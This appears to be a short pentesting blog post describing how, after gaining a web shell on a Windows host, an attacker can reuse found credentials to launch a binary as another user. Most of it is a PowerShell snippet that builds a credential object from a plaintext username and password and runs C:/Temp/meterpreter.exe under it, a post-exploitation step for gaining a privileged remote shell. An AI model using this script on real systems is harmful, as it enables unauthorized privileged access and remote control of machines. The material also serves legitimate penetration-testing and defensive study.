Using stored creds to get privileged shell on windows(powershell version).

Scenario: Having initial access to webapp, or system and found credentials that can be used to run commands(maybe pentester have initial reverse shell through webapp) and also be able to create admin account on machine but all ports are locked out except web ports.

following script can be helpful to execute uploaded binary using different credentials if pentester have initial shell or even web shell.

$username = 'username'
$password = 'password'

$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process C:/Temp/meterpreter.exe -Credential $credential
Tagged in:,


Leave a Reply

Your email address will not be published.